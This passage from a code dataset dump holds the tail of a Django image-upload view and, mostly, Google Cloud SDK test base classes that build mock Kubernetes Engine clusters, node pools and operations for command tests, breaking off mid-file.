imgname.append(pic.name)\n new_img.save()\n return JsonResponse({\"result\":imgname,\"msg\":\"成功\"})\n","sub_path":"PenetrationTemplate/generateReport/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"593917942","text":"# -*- coding: utf-8 -*- #\n# Copyright 2014 Google Inc. 
All Rights Reserved.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Base classes for container tests.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport datetime\nimport json\nimport os\n\nfrom apitools.base.py import encoding\nfrom apitools.base.py.testing import mock\nfrom dateutil import parser\nfrom dateutil import tz\nfrom googlecloudsdk.api_lib.container import api_adapter\nfrom googlecloudsdk.api_lib.container import kubeconfig as kconfig\nfrom googlecloudsdk.api_lib.util import apis as core_apis\nfrom googlecloudsdk.calliope import base as calliope_base\nfrom googlecloudsdk.core import config as core_config\nfrom googlecloudsdk.core import exceptions as core_exceptions\nfrom googlecloudsdk.core import log\nfrom googlecloudsdk.core import properties\nfrom googlecloudsdk.core import resources\nfrom googlecloudsdk.core.util import files as file_utils\nfrom googlecloudsdk.core.util import platforms\nfrom googlecloudsdk.core.util import times\nfrom tests.lib import cli_test_base\nfrom tests.lib import e2e_base\nfrom tests.lib import sdk_test_base\nfrom tests.lib.apitools import http_error\n\n\nclass Error(Exception):\n pass\n\n\nclass UnexpectedCallException(Error):\n \"\"\"For unexpected calls to mocked functions.\"\"\"\n\nNOT_FOUND_ERROR = http_error.MakeHttpError(404, 'not found')\nUNAUTHORIZED_ERROR = http_error.MakeHttpError(403, 'unauthorized')\n\nFAKE_SDK_BIN_PATH = os.path.join('fake', 'bin', 'path')\n\n\ndef format_date_time(duration):\n \"\"\"Return RFC3339 string for datetime that is now + given duration.\n\n Args:\n duration: string ISO 8601 duration, e.g. 
'P5D' for period 5 days.\n Returns:\n string timestamp\n \"\"\"\n # We use a format that preserves +00:00 for UTC to match timestamp format\n # returned by container API.\n fmt = '%Y-%m-%dT%H:%M:%S.%3f%Oz'\n return times.FormatDateTime(\n times.ParseDateTime(duration, tzinfo=times.UTC), fmt=fmt)\n\n\nclass UnitTestBase(cli_test_base.CliTestBase, sdk_test_base.WithFakeAuth):\n \"\"\"Base class for all Container tests.\"\"\"\n\n COMMAND_BASE = 'container'\n PASSWORD = 'test-password'\n CLUSTER_NAME = 'my-cluster'\n ZONE = 'us-central1-f'\n REGION = 'us-central1'\n PROJECT_ID = 'fake-project-id'\n PROJECT_REF = resources.REGISTRY.Create('container.projects',\n projectsId=PROJECT_ID)\n PROJECT_NUM = 123456789012\n NUM_NODES = 3\n AUTH_USER = 'admin'\n NODE_POOL_NAME = 'my-pool'\n OPERATION_TARGET = '/projects/{0}/zones/{1}/clusters/{2}'\n TARGET_LINK = 'https://container.googleapis.com/{0}/projects/{1}/zones/{2}/clusters/{3}' # pylint: disable=line-too-long\n NODE_POOL_TARGET_LINK = 'https://container.googleapis.com/{0}/projects/{1}/zones/{2}/clusters/{3}/nodePools/{4}' # pylint: disable=line-too-long\n MOCK_OPERATION_ID = 'operation-1414184316101-d4546dd2'\n MOCK_OPERATION_TARGET = OPERATION_TARGET.format(\n PROJECT_NUM, ZONE, CLUSTER_NAME)\n ENDPOINT = '130.211.191.49'\n VERSION = '1.8.0'\n INSTANCE_GROUP_URL = 'https://www.googleapis.com/compute/v1/projects/{0}/zones/{1}/instanceGroupManagers/gke-{2}-group' # pylint: disable=line-too-long\n\n def SetUp(self):\n self.MOCK_TARGET_LINK = self.TARGET_LINK.format( # pylint: disable=invalid-name\n self.API_VERSION, self.PROJECT_NUM, self.ZONE, self.CLUSTER_NAME)\n self.MOCK_NODE_POOL_TARGET_LINK = self.NODE_POOL_TARGET_LINK.format( # pylint: disable=invalid-name\n self.API_VERSION, self.PROJECT_NUM, self.ZONE,\n self.CLUSTER_NAME, self.NODE_POOL_NAME)\n properties.VALUES.core.project.Set(self.PROJECT_ID)\n self.mocked_client = mock.Client(\n core_apis.GetClientClass('container', self.API_VERSION),\n real_client=core_apis.GetClientInstance(\n 'container', self.API_VERSION, no_http=True))\n self.mocked_client.Mock()\n self.addCleanup(self.mocked_client.Unmock)\n\n self.mocked_compute_client_v1 = mock.Client(\n core_apis.GetClientClass('compute', 'v1'),\n real_client=core_apis.GetClientInstance('compute', 'v1', no_http=True))\n self.mocked_compute_client_v1.Mock()\n self.addCleanup(self.mocked_compute_client_v1.Unmock)\n\n # For faster tests\n self.StartPatch('time.sleep')\n\n # Set/unset envvars that affect kubeconfig behavior to avoid overwriting\n # actual files when running tests locally.\n self.tmp_home = file_utils.TemporaryDirectory()\n self.assertIsNotNone(self.tmp_home.path)\n self.StartDictPatch('os.environ', {'HOME': self.tmp_home.path})\n if os.environ.get('KUBECONFIG'):\n del os.environ['KUBECONFIG']\n\n def TearDown(self):\n self.tmp_home.Close()\n\n def Project(self):\n return None\n\n def _PatchSDKBinPath(self):\n fake_bin_path = self.StartPropertyPatch(core_config.Paths, 'sdk_bin_path')\n fake_bin_path.return_value = FAKE_SDK_BIN_PATH\n\n def _RunningCluster(self, **kwargs):\n return self._RunningClusterForVersion(self.VERSION, **kwargs)\n\n def _RunningClusterForVersion(self, version, **kwargs):\n name = kwargs.get('name', self.CLUSTER_NAME)\n defaults = {\n 'status': self.running,\n 'zone': kwargs.get('zone', self.ZONE),\n 'statusMessage': 'Running',\n 'endpoint': self.ENDPOINT,\n 'clusterApiVersion': version,\n 'currentMasterVersion': version,\n 'ca_data': 'fakecertificateauthoritydata',\n 'key_data': 'fakeclientkeydata',\n 
'cert_data': 'fakeclientcertificatedata',\n 'currentNodeCount': self.NUM_NODES,\n 'currentNodeVersion': version,\n 'instanceGroupUrls': [self._MakeInstanceGroupUrl(self.PROJECT_ID,\n self.ZONE,\n name)],\n }\n defaults.update(kwargs)\n return self._MakeCluster(**defaults)\n\n def _RunningClusterWithNodePool(self, **kwargs):\n name = kwargs.get('name', self.CLUSTER_NAME)\n pool_name = kwargs.get('nodePoolName', self.NODE_POOL_NAME)\n zone = kwargs.get('zone', self.ZONE)\n defaults = {\n 'name': name,\n 'nodePoolName': pool_name,\n 'instanceGroupUrls': [self._MakeInstanceGroupUrl(self.PROJECT_ID,\n zone,\n name,\n pool_name)],\n }\n defaults.update(kwargs)\n return self._RunningCluster(**defaults)\n\n def _TestDefaultAuth(self, c_config):\n self._TestGcloudCredentials(c_config)\n\n def _TestGcloudCredentials(self, c_config):\n kubeconfig = kconfig.Kubeconfig.Default()\n self.assertIsNotNone(c_config)\n self.assertTrue(c_config.has_ca_cert)\n self.assertIsNotNone(c_config.auth_provider)\n self.assertEqual(c_config.auth_provider.get('name'), 'gcp')\n bin_name = 'gcloud'\n if platforms.OperatingSystem.IsWindows():\n bin_name = 'gcloud.cmd'\n self.assertDictEqual(\n kubeconfig.users[c_config.kube_context]['user']['auth-provider'],\n {\n 'name': 'gcp',\n 'config': {\n 'cmd-path': os.path.join(FAKE_SDK_BIN_PATH, bin_name),\n 'cmd-args': 'config config-helper --format=json',\n 'token-key': '{.credential.access_token}',\n 'expiry-key': '{.credential.token_expiry}',\n }\n })\n self.assertTrue(c_config.has_ca_cert)\n\n def _TestAppDefaultCredentials(self, c_config):\n kubeconfig = kconfig.Kubeconfig.Default()\n self.assertIsNotNone(c_config)\n self.assertTrue(c_config.has_ca_cert)\n self.assertIsNotNone(c_config.auth_provider)\n self.assertEqual(c_config.auth_provider.get('name'), 'gcp')\n self.assertDictEqual(\n kubeconfig.users[c_config.kube_context]['user']['auth-provider'],\n {'name': 'gcp'})\n self.assertTrue(c_config.has_ca_cert)\n\n\nclass TestBase(cli_test_base.CliTestBase):\n \"\"\"Mixin class for testing.\"\"\"\n\n def SetUp(self):\n self.messages = core_apis.GetMessagesModule('container', self.API_VERSION)\n self.compute_messages = core_apis.GetMessagesModule('compute', 'v1')\n self.op_delete = self.messages.Operation.OperationTypeValueValuesEnum.DELETE_CLUSTER # pylint: disable=line-too-long\n self.op_create = self.messages.Operation.OperationTypeValueValuesEnum.CREATE_CLUSTER # pylint: disable=line-too-long\n self.op_done = self.messages.Operation.StatusValueValuesEnum.DONE\n self.op_pending = self.messages.Operation.StatusValueValuesEnum.PENDING\n self.op_abort = self.messages.Operation.StatusValueValuesEnum.ABORTING\n self.op_upgrade_nodes = self.messages.Operation.OperationTypeValueValuesEnum.UPGRADE_NODES # pylint: disable=line-too-long\n self.op_upgrade_master = self.messages.Operation.OperationTypeValueValuesEnum.UPGRADE_MASTER # pylint: disable=line-too-long\n self.op_update_cluster = self.messages.Operation.OperationTypeValueValuesEnum.UPDATE_CLUSTER # pylint: disable=line-too-long\n self.op_set_master_auth = self.messages.Operation.OperationTypeValueValuesEnum.SET_MASTER_AUTH # pylint: disable=line-too-long\n self.op_set_labels = self.messages.Operation.OperationTypeValueValuesEnum.SET_LABELS # pylint: disable=line-too-long\n self.compute_op_done = self.compute_messages.Operation.StatusValueValuesEnum.DONE # pylint: disable=line-too-long\n self.compute_op_pending = self.compute_messages.Operation.StatusValueValuesEnum.PENDING # pylint: disable=line-too-long\n self.provisioning = 
self.messages.Cluster.StatusValueValuesEnum.PROVISIONING\n self.stopping = self.messages.Cluster.StatusValueValuesEnum.STOPPING\n self.running = self.messages.Cluster.StatusValueValuesEnum.RUNNING\n self.error = self.messages.Cluster.StatusValueValuesEnum.ERROR\n self.reconciling = self.messages.Cluster.StatusValueValuesEnum.RECONCILING\n self.degraded = self.messages.Cluster.StatusValueValuesEnum.DEGRADED\n self.action_set_password = self.messages.SetMasterAuthRequest.ActionValueValuesEnum.SET_PASSWORD # pylint: disable=line-too-long\n self.action_generate_password = self.messages.SetMasterAuthRequest.ActionValueValuesEnum.GENERATE_PASSWORD # pylint: disable=line-too-long\n self.action_set_username = self.messages.SetMasterAuthRequest.ActionValueValuesEnum.SET_USERNAME # pylint: disable=line-too-long\n\n def _MakeCluster(self, **kwargs):\n # Construct the default pool, if we don't have any passed in. We\n # can't know all the possible permutations, so any tests involving\n # multiple nodepools must construct them prior to _MakeCluster.\n if kwargs.get('nodePools') is None:\n pool = self._MakeDefaultNodePool(**kwargs)\n kwargs['nodePools'] = [pool]\n kwargs['instanceGroupUrls'] = pool.instanceGroupUrls\n\n c = self.messages.Cluster(\n masterAuth=self.messages.MasterAuth(\n password=kwargs.get('password'),\n username=kwargs.get('username', self.AUTH_USER),\n clusterCaCertificate=kwargs.get('ca_data'),\n clientKey=kwargs.get('key_data'),\n clientCertificate=kwargs.get('cert_data'),\n clientCertificateConfig=self.messages.ClientCertificateConfig(\n issueClientCertificate=True,),\n ),\n name=kwargs.get('name', self.CLUSTER_NAME),\n currentNodeCount=kwargs.get('currentNodeCount'),\n initialNodeCount=kwargs.get('initialNodeCount'),\n locations=kwargs.get('locations', []),\n endpoint=kwargs.get('endpoint'),\n status=kwargs.get('status'),\n statusMessage=kwargs.get('statusMessage'),\n zone=kwargs.get('zone'),\n initialClusterVersion=kwargs.get('clusterApiVersion'),\n currentMasterVersion=kwargs.get('currentMasterVersion'),\n network=kwargs.get('network'),\n subnetwork=kwargs.get('subnetwork'),\n loggingService=kwargs.get('loggingService'),\n monitoringService=kwargs.get('monitoringService'),\n clusterIpv4Cidr=kwargs.get('clusterIpv4Cidr'),\n currentNodeVersion=kwargs.get('currentNodeVersion'),\n instanceGroupUrls=kwargs.get('instanceGroupUrls', []),\n addonsConfig=kwargs.get('addonsConfig'),\n nodePools=kwargs.get('nodePools'),\n nodeConfig=kwargs.get('nodeConfig'),\n enableKubernetesAlpha=kwargs.get('enableKubernetesAlpha'),\n expireTime=kwargs.get('expireTime'),\n selfLink=kwargs.get('selfLink'),\n masterAuthorizedNetworksConfig=kwargs.get('authorizedNetworks'),\n legacyAbac=kwargs.get('legacyAbac'),\n resourceLabels=kwargs.get('labels'),\n maintenancePolicy=kwargs.get('maintenancePolicy'),\n )\n if kwargs.get('conditions'):\n c.conditions.extend(kwargs.get('conditions'))\n return c\n\n def _MakeClusterWithAutoscaling(self, **kwargs):\n pool = self.messages.NodePool(\n autoscaling=kwargs.get('autoscaling')\n )\n kwargs['nodePools'] = [pool]\n return self._MakeCluster(**kwargs)\n\n def _MakeDefaultNodePool(self, **kwargs):\n pool_args = kwargs.copy()\n pool_args['name'] = kwargs.get('nodePoolName', 'default-pool')\n return self._MakeNodePool(**pool_args)\n\n def _MakeNodePool(self, **kwargs):\n return self.messages.NodePool(\n name=kwargs.get('name', self.NODE_POOL_NAME),\n version=kwargs.get('nodeVersion'),\n initialNodeCount=kwargs.get('initialNodeCount', self.NUM_NODES),\n 
config=self.messages.NodeConfig(\n diskSizeGb=kwargs.get('diskSizeGb'),\n diskType=kwargs.get('diskType'),\n machineType=kwargs.get('machineType'),\n oauthScopes=kwargs.get('oauthScopes', self._DEFAULT_SCOPES),\n localSsdCount=kwargs.get('localSsdCount'),\n tags=kwargs.get('tags', []),\n labels=kwargs.get('nodeLabels'),\n imageType=kwargs.get('imageType'),\n nodeImageConfig=kwargs.get('nodeImageConfig'),\n preemptible=kwargs.get('preemptible'),\n serviceAccount=kwargs.get('serviceAccount'),\n accelerators=kwargs.get('accelerators', []),\n minCpuPlatform=kwargs.get('minCpuPlatform'),\n taints=kwargs.get('nodeTaints', []),\n ),\n instanceGroupUrls=kwargs.get('instanceGroupUrls', []),\n autoscaling=kwargs.get('autoscaling'),\n management=kwargs.get('management'),\n )\n\n def _MakeIPAllocationPolicy(self, **kwargs):\n policy = self.messages.IPAllocationPolicy()\n if 'useIpAliases' in kwargs:\n policy.useIpAliases = kwargs['useIpAliases']\n if 'createSubnetwork' in kwargs:\n policy.createSubnetwork = kwargs['createSubnetwork']\n if 'subnetworkName' in kwargs:\n policy.subnetworkName = kwargs['subnetworkName']\n if 'clusterIpv4Cidr' in kwargs:\n policy.clusterIpv4CidrBlock = kwargs['clusterIpv4Cidr']\n if 'nodeIpv4Cidr' in kwargs:\n policy.nodeIpv4CidrBlock = kwargs['nodeIpv4Cidr']\n if 'servicesIpv4Cidr' in kwargs:\n policy.servicesIpv4CidrBlock = kwargs['servicesIpv4Cidr']\n if 'tpuIpv4Cidr' in kwargs:\n policy.tpuIpv4CidrBlock = kwargs['tpuIpv4Cidr']\n if 'clusterSecondaryRangeName' in kwargs:\n policy.clusterSecondaryRangeName = kwargs['clusterSecondaryRangeName']\n if 'servicesSecondaryRangeName' in kwargs:\n policy.servicesSecondaryRangeName = kwargs['servicesSecondaryRangeName']\n return policy\n\n def _ServerConfig(self):\n return self.messages.ServerConfig(defaultClusterVersion=self.VERSION)\n\n def _MakeOperation(self, **kwargs):\n status = kwargs.get('errorMessage', kwargs.get('statusMessage'))\n return self.messages.Operation(\n statusMessage=status,\n name=kwargs.get('name', self.MOCK_OPERATION_ID),\n operationType=kwargs.get('operationType', self.op_create),\n status=kwargs.get('status', self.op_pending),\n targetLink=kwargs.get('targetLink', self.MOCK_TARGET_LINK),\n zone=kwargs.get('zone', self.ZONE),\n detail=kwargs.get('detail'),\n )\n\n def _MakeNodePoolOperation(self, **kwargs):\n status = kwargs.get('errorMessage', kwargs.get('statusMessage'))\n return self.messages.Operation(\n statusMessage=status,\n name=kwargs.get('name', self.MOCK_OPERATION_ID),\n operationType=kwargs.get('operationType', self.op_create),\n status=kwargs.get('status', self.op_pending),\n targetLink=kwargs.get('targetLink', self.MOCK_NODE_POOL_TARGET_LINK),\n zone=kwargs.get('zone', self.ZONE),\n )\n\n def _MakeComputeOperation(self, **kwargs):\n return self.compute_messages.Operation(\n statusMessage=kwargs.get('errorMessage'),\n name=kwargs.get('name', self.MOCK_OPERATION_ID),\n operationType=kwargs.get('operationType', 'update'),\n status=kwargs.get('status', self.compute_op_done),\n targetLink=kwargs.get('targetLink', self.MOCK_TARGET_LINK),\n zone=kwargs.get('zone', self.ZONE),\n )\n\n def _MakeInstanceGroupUrl(self, project, zone, cluster_name, pool_name=None):\n igm = cluster_name\n if pool_name:\n igm += '-' + pool_name\n return self.INSTANCE_GROUP_URL.format(project, zone, igm)\n\n def ExpectGetCluster(self, cluster, exception=None, zone=None):\n raise NotImplementedError('ExpectGetCluster is not overridden')\n\n def ExpectCreateCluster(self, cluster, response=None,\n exception=None, 
zone=None):\n raise NotImplementedError('ExpectCreateCluster is not overridden')\n\n def ExpectDeleteCluster(self, cluster_name, response=None,\n exception=None, zone=None):\n raise NotImplementedError('ExpectDeleteCluster is not overridden')\n\n def ExpectListClusters(self, clusters, zone=None, project_id=None,\n missing=None):\n raise NotImplementedError('ExpectListClusters is not overridden')\n\n def ExpectGetOperation(self, response, exception=None):\n raise NotImplementedError('ExpectGetOperation is not overridden')\n\n def ExpectListOperation(self, response, exception=None):\n raise NotImplementedError('ExpectListOperation is not overridden')\n\n def ExpectResize(self, cluster, size, ig):\n group = os.path.basename(ig)\n op = self._MakeComputeOperation(name='resize_' + group)\n self.mocked_compute_client_v1.instanceGroupManagers.Resize.Expect(\n self.compute_messages.ComputeInstanceGroupManagersResizeRequest(\n instanceGroupManager=group,\n project=self.PROJECT_ID,\n zone=cluster.zone,\n size=size),\n op)\n return op\n\n def ExpectResizeNodePool(self, node_pool_name, size, response=None,\n exception=None, zone=None):\n raise NotImplementedError('ExpectResizeNodePool is not overridden')\n\n def ExpectCreateNodePool(self,\n node_pool,\n response=None,\n exception=None,\n zone=None):\n raise NotImplementedError('ExpectCreateNodePool is not overridden')\n\n def ExpectGetNodePool(self, node_pool_id, response=None,\n exception=None, zone=None):\n raise NotImplementedError('ExpectGetNodePool is not overridden')\n\n def ExpectDeleteNodePool(self, node_pool_name, response=None,\n exception=None, zone=None):\n raise NotImplementedError('ExpectDeleteNodePool is not overridden')\n\n def ExpectUpdateNodePool(self,\n node_pool_name,\n node_management,\n response=None,\n exception=None,\n zone=None):\n raise NotImplementedError('ExpectUpdateNodePool is not overridden')\n\n def _MakeListNodePoolsResponse(self, node_pools):\n return self.messages.ListNodePoolsResponse(nodePools=node_pools)\n\n def ExpectListNodePools(self, project_id=None, response=None,\n exception=None, zone=None):\n raise NotImplementedError('ExpectListNodePools is not overridden')\n\n def ExpectRollbackOperation(self, node_pool_name, response=None,\n exception=None, zone=None):\n raise NotImplementedError('ExpectRollbackOperation is not overridden')\n\n def ExpectCancelOperation(self, op=None, exception=None):\n raise NotImplementedError('ExpectCancelOperation is not overridden')\n\n def ExpectSetLabels(self,\n cluster_name,\n resource_labels,\n fingerprint,\n response=None, zone=None):\n raise NotImplementedError('ExpectSetLabels is not overridden')\n\n def ExpectUpgradeCluster(self, cluster_name, update, response, location=None):\n raise NotImplementedError('ExpectUpgradeCluster is not overridden')\n\n def ExpectUpdateCluster(self, cluster_name, update, response):\n raise NotImplementedError('ExpectUpdateCluster is not overridden')\n\n def ExpectSetMasterAuth(self, cluster_name, action, update, response):\n raise NotImplementedError('ExpectSetMasterAuth is not overridden')\n\n def ExpectLegacyAbac(self, cluster_name, enabled, response):\n raise NotImplementedError('ExpectLegacyAbac is not overridden')\n\n def ExpectStartIpRotation(self, cluster_name, response=None, exception=None):\n raise NotImplementedError('ExpectStartIpRotation is not overridden')\n\n def ExpectCompleteIpRotation(self,\n cluster_name,\n response=None,\n exception=None):\n raise NotImplementedError('ExpectCompleteIpRotation is not overridden')\n\n def 
ExpectSetNetworkPolicy(self, cluster_name, enabled=True, response=None):\n raise NotImplementedError('ExpectSetNetworkPolicy is not overridden')\n\n def ExpectSetLoggingService(self,\n cluster_name,\n logging_service,\n response=None,\n exception=None):\n raise NotImplementedError('ExpectSetLoggingService is not overridden')\n\n def ExpectSetMaintenanceWindow(self,\n cluster_name,\n policy=None,\n response=None):\n raise NotImplementedError('ExpectSetMaintenanceWindow is not overridden')\n\n def ExpectGetServerConfig(self, location, exception=None):\n raise NotImplementedError('ExpectGetServerConfig is not overridden')\n\n\nclass GATestBase(TestBase):\n \"\"\"Mixin class for testing v1.\"\"\"\n API_VERSION = 'v1'\n\n # Sort the scopes to assert equality of the lists\n _DEFAULT_SCOPES = sorted([\n 'gke-version-default',\n 'https://www.googleapis.com/auth/devstorage.read_only',\n 'https://www.googleapis.com/auth/logging.write',\n 'https://www.googleapis.com/auth/monitoring',\n 'https://www.googleapis.com/auth/service.management.readonly',\n 'https://www.googleapis.com/auth/servicecontrol',\n 'https://www.googleapis.com/auth/trace.append',\n ])\n\n def SetUp(self):\n self.track = calliope_base.ReleaseTrack.GA\n\n def ExpectCreateCluster(self, cluster, response=None,\n exception=None, zone=None):\n if not zone:\n zone = self.ZONE\n self.mocked_client.projects_locations_clusters.Create.Expect(\n self.messages.CreateClusterRequest(\n cluster=cluster,\n parent=api_adapter.ProjectLocation(self.PROJECT_ID, zone)),\n response=response,\n exception=exception)\n\n def ExpectDeleteCluster(self,\n cluster_name,\n response=None,\n exception=None,\n zone=None):\n if not zone:\n zone = self.ZONE\n self.mocked_client.projects_locations_clusters.Delete.Expect(\n self.messages.ContainerProjectsLocationsClustersDeleteRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, zone, cluster_name)),\n response=response,\n exception=exception)\n\n def ExpectGetCluster(self, cluster, exception=None, zone=None):\n if not zone:\n zone = self.ZONE\n if exception:\n response = None\n else:\n response = cluster\n self.mocked_client.projects_locations_clusters.Get.Expect(\n self.messages.ContainerProjectsLocationsClustersGetRequest(\n # use the response operation name/zone same as request\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, zone, cluster.name)),\n response,\n exception=exception)\n\n def ExpectListClusters(self,\n clusters,\n zone=None,\n project_id=None,\n missing=None):\n if not project_id:\n project_id = self.PROJECT_ID\n if not zone:\n zone = '-'\n if not missing:\n missing = []\n self.mocked_client.projects_locations_clusters.List.Expect(\n self.messages.ContainerProjectsLocationsClustersListRequest(\n parent=api_adapter.ProjectLocation(project_id, zone)),\n self.messages.ListClustersResponse(\n clusters=clusters, missingZones=missing))\n\n def ExpectCreateNodePool(self,\n node_pool,\n response=None,\n exception=None,\n zone=None):\n if not zone:\n zone = self.ZONE\n self.mocked_client.projects_locations_clusters_nodePools.Create.Expect(\n self.messages.CreateNodePoolRequest(\n parent=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, zone, self.CLUSTER_NAME),\n nodePool=node_pool),\n response=response,\n exception=exception)\n\n # TODO(b/64575339) Make this work more like GetCluster (specifically, infer\n # node_pool_id from node_pool (response).\n def ExpectGetNodePool(self, node_pool_id, response=None,\n exception=None, zone=None):\n if not zone:\n zone = self.ZONE\n 
self.mocked_client.projects_locations_clusters_nodePools.Get.Expect(\n self.messages.ContainerProjectsLocationsClustersNodePoolsGetRequest(\n # use the response operation name/zone same as request\n name=api_adapter.ProjectLocationClusterNodePool(\n self.PROJECT_ID, zone, self.CLUSTER_NAME, node_pool_id)),\n response=response,\n exception=exception)\n\n def ExpectDeleteNodePool(self,\n node_pool_name,\n response=None,\n exception=None,\n zone=None):\n if not zone:\n zone = self.ZONE\n self.mocked_client.projects_locations_clusters_nodePools.Delete.Expect(\n self.messages.ContainerProjectsLocationsClustersNodePoolsDeleteRequest(\n name=api_adapter.ProjectLocationClusterNodePool(\n self.PROJECT_ID, zone, self.CLUSTER_NAME, node_pool_name)),\n response=response,\n exception=exception)\n\n def ExpectUpdateNodePool(self,\n node_pool_name,\n node_management,\n response=None,\n exception=None,\n zone=None):\n if not zone:\n zone = self.ZONE\n (self.mocked_client.projects_locations_clusters_nodePools.\n SetManagement.Expect(\n self.messages.SetNodePoolManagementRequest(\n name=api_adapter.ProjectLocationClusterNodePool(\n self.PROJECT_ID, zone, self.CLUSTER_NAME, node_pool_name),\n management=node_management),\n response=response,\n exception=exception))\n\n def ExpectListNodePools(self,\n response=None,\n exception=None,\n zone=None):\n if not zone:\n zone = self.ZONE\n self.mocked_client.projects_locations_clusters_nodePools.List.Expect(\n self.messages.ContainerProjectsLocationsClustersNodePoolsListRequest(\n parent=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, zone, self.CLUSTER_NAME)),\n response=response,\n exception=exception)\n\n def ExpectResizeNodePool(self, node_pool_name, size, response=None,\n exception=None, zone=None):\n if not zone:\n zone = self.ZONE\n req = self.messages.SetNodePoolSizeRequest(\n name=api_adapter.ProjectLocationClusterNodePool(\n self.PROJECT_ID, zone, self.CLUSTER_NAME, node_pool_name),\n nodeCount=size\n )\n self.mocked_client.projects_locations_clusters_nodePools.SetSize.Expect(\n req,\n response=response,\n exception=exception)\n\n def ExpectRollbackOperation(self, node_pool_name, response=None,\n exception=None, zone=None):\n if not zone:\n zone = self.ZONE\n self.mocked_client.projects_locations_clusters_nodePools.Rollback.Expect(\n self.messages.RollbackNodePoolUpgradeRequest(\n name=api_adapter.ProjectLocationClusterNodePool(\n self.PROJECT_ID, zone, self.CLUSTER_NAME, node_pool_name)),\n response=response,\n exception=exception)\n\n def ExpectGetOperation(self, response, exception=None):\n # use the response operation name/zone same as request\n req = self.messages.ContainerProjectsLocationsOperationsGetRequest(\n name=api_adapter.ProjectLocationOperation(\n self.PROJECT_ID, response.zone, response.name))\n if exception:\n response = None\n self.mocked_client.projects_locations_operations.Get.Expect(\n req, response=response, exception=exception)\n\n def ExpectListOperation(self, zone, response, exception=None):\n req = self.messages.ContainerProjectsLocationsOperationsListRequest(\n parent=api_adapter.ProjectLocation(self.PROJECT_ID, zone))\n if exception:\n response = None\n self.mocked_client.projects_locations_operations.List.Expect(\n req, response=response, exception=exception)\n\n def ExpectCancelOperation(self, op=None, exception=None):\n self.mocked_client.projects_locations_operations.Cancel.Expect(\n self.messages.CancelOperationRequest(\n name=api_adapter.ProjectLocationOperation(\n self.PROJECT_ID, self.ZONE, op.name)),\n 
response=self.messages.Empty(),\n exception=exception)\n\n def ExpectSetLabels(self,\n cluster_name,\n resource_labels,\n fingerprint,\n response=None, zone=None):\n if not zone:\n zone = self.ZONE\n self.mocked_client.projects_locations_clusters.SetResourceLabels.Expect(\n self.messages.SetLabelsRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, zone, cluster_name),\n resourceLabels=resource_labels,\n labelFingerprint=fingerprint),\n response)\n\n def ExpectUpgradeCluster(self, cluster_name, update, response, location=None):\n if not location:\n location = self.ZONE\n self.mocked_client.projects_locations_clusters.Update.Expect(\n self.msgs.UpdateClusterRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, location, cluster_name),\n update=update),\n response=response)\n\n def ExpectUpdateCluster(self, cluster_name, update, response):\n self.mocked_client.projects_locations_clusters.Update.Expect(\n self.msgs.UpdateClusterRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, self.ZONE, cluster_name),\n update=update),\n response=response)\n\n def ExpectSetMasterAuth(self,\n cluster_name,\n action,\n update,\n response=None,\n exception=None):\n self.mocked_client.projects_locations_clusters.SetMasterAuth.Expect(\n self.msgs.SetMasterAuthRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, self.ZONE, cluster_name),\n action=action,\n update=update),\n response=response,\n exception=exception)\n\n def ExpectLegacyAbac(self, cluster_name, enabled, response):\n self.mocked_client.projects_locations_clusters.SetLegacyAbac.Expect(\n self.msgs.SetLegacyAbacRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, self.ZONE, cluster_name),\n enabled=enabled),\n response=response)\n\n def ExpectStartIpRotation(self,\n cluster_name,\n rotate_credentials=False,\n response=None,\n exception=None):\n self.mocked_client.projects_locations_clusters.StartIpRotation.Expect(\n self.msgs.StartIPRotationRequest(\n name=api_adapter.ProjectLocationCluster(self.PROJECT_ID, self.ZONE,\n cluster_name),\n rotateCredentials=rotate_credentials),\n response=response,\n exception=exception)\n\n def ExpectCompleteIpRotation(self,\n cluster_name,\n response=None,\n exception=None):\n self.mocked_client.projects_locations_clusters.CompleteIpRotation.Expect(\n self.msgs.CompleteIPRotationRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, self.ZONE, cluster_name)),\n response=response,\n exception=exception)\n\n def ExpectSetNetworkPolicy(self, cluster_name, enabled=True, response=None):\n self.mocked_client.projects_locations_clusters.SetNetworkPolicy.Expect(\n self.msgs.SetNetworkPolicyRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, self.ZONE, cluster_name),\n networkPolicy=self.msgs.NetworkPolicy(\n enabled=enabled,\n provider=self.msgs.NetworkPolicy.\n ProviderValueValuesEnum.CALICO)),\n response=response)\n\n def ExpectSetLoggingService(self,\n cluster_name,\n logging_service,\n response=None,\n exception=None):\n self.mocked_client.projects_locations_clusters.SetLogging.Expect(\n self.msgs.SetLoggingServiceRequest(\n name=api_adapter.ProjectLocationCluster(\n self.PROJECT_ID, self.ZONE, cluster_name),\n loggingService=logging_service),\n response=response,\n exception=exception)\n\n def ExpectSetMaintenanceWindow(self, cluster_name, policy=None,\n response=None):\n self.mocked_client.projects_locations_clusters.SetMaintenancePolicy.Expect(\n self.msgs.SetMaintenancePolicyRequest(\n 
